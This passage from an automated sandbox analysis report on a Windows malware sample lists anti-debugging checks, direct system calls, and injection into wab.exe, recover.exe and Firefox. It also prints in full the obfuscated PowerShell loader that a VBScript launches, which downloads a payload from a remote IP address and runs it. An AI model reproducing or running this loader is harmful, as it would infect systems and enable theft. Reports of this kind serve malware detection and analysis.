        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h]10_2_1FD97A80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h]10_2_1FDAEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FA87 mov eax, dword ptr fs:[00000030h]10_2_1FE5FA87
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE74A80 mov eax, dword ptr fs:[00000030h]10_2_1FE74A80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDAAE mov eax, dword ptr fs:[00000030h]10_2_1FDCDAAE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABAA0 mov eax, dword ptr fs:[00000030h]10_2_1FDABAA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABAA0 mov eax, dword ptr fs:[00000030h]10_2_1FDABAA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8AA0 mov eax, dword ptr fs:[00000030h]10_2_1FDA8AA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8AA0 mov eax, dword ptr fs:[00000030h]10_2_1FDA8AA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDF6AA4 mov eax, dword ptr fs:[00000030h]10_2_1FDF6AA4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9FAA4 mov ecx, dword ptr fs:[00000030h]10_2_1FD9FAA4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0A5B mov eax, dword ptr fs:[00000030h]10_2_1FDB0A5B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0A5B mov eax, dword ptr fs:[00000030h]10_2_1FDB0A5B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6A50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6A50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6A50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6A50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6A50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6A50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6A50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1CA72 mov eax, dword ptr fs:[00000030h]10_2_1FE1CA72
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1CA72 mov eax, dword ptr fs:[00000030h]10_2_1FE1CA72
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD99A40 mov ecx, dword ptr fs:[00000030h]10_2_1FD99A40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h]10_2_1FE33A78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h]10_2_1FE33A78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h]10_2_1FE33A78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h]10_2_1FE33A78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h]10_2_1FE33A78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h]10_2_1FE33A78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h]10_2_1FDDCA6F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h]10_2_1FDDCA6F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h]10_2_1FDDCA6F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC9A18 mov ecx, dword ptr fs:[00000030h]10_2_1FDC9A18
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9BA10 mov eax, dword ptr fs:[00000030h]10_2_1FD9BA10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h]10_2_1FDD5A01
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD5A01 mov ecx, dword ptr fs:[00000030h]10_2_1FDD5A01
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h]10_2_1FDD5A01
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h]10_2_1FDD5A01
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCA38 mov eax, dword ptr fs:[00000030h]10_2_1FDDCA38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FA02 mov eax, dword ptr fs:[00000030h]10_2_1FE5FA02
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC4A35 mov eax, dword ptr fs:[00000030h]10_2_1FDC4A35
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC4A35 mov eax, dword ptr fs:[00000030h]10_2_1FDC4A35
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h]10_2_1FDABA30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABA30 mov ecx, dword ptr fs:[00000030h]10_2_1FDABA30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h]10_2_1FDABA30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h]10_2_1FDABA30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h]10_2_1FDABA30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h]10_2_1FDABA30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCEA2E mov eax, dword ptr fs:[00000030h]10_2_1FDCEA2E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2CA11 mov eax, dword ptr fs:[00000030h]10_2_1FE2CA11
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE47A11 mov edi, dword ptr fs:[00000030h]10_2_1FE47A11
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCA24 mov eax, dword ptr fs:[00000030h]10_2_1FDDCA24
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDA20 mov eax, dword ptr fs:[00000030h]10_2_1FDCDA20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDA20 mov eax, dword ptr fs:[00000030h]10_2_1FDCDA20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1DA1D mov eax, dword ptr fs:[00000030h]10_2_1FE1DA1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h]10_2_1FDAA9D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h]10_2_1FDAA9D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h]10_2_1FDAA9D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h]10_2_1FDAA9D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h]10_2_1FDAA9D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h]10_2_1FDAA9D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCD9D0 mov eax, dword ptr fs:[00000030h]10_2_1FDCD9D0

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtClose: Direct from: 0x77382B6C
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeSection loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeThread register set: target process: 5996Jump to behavior
        Source: C:\Windows\SysWOW64\recover.exeThread APC queued: target process: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: C0FFCCJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') 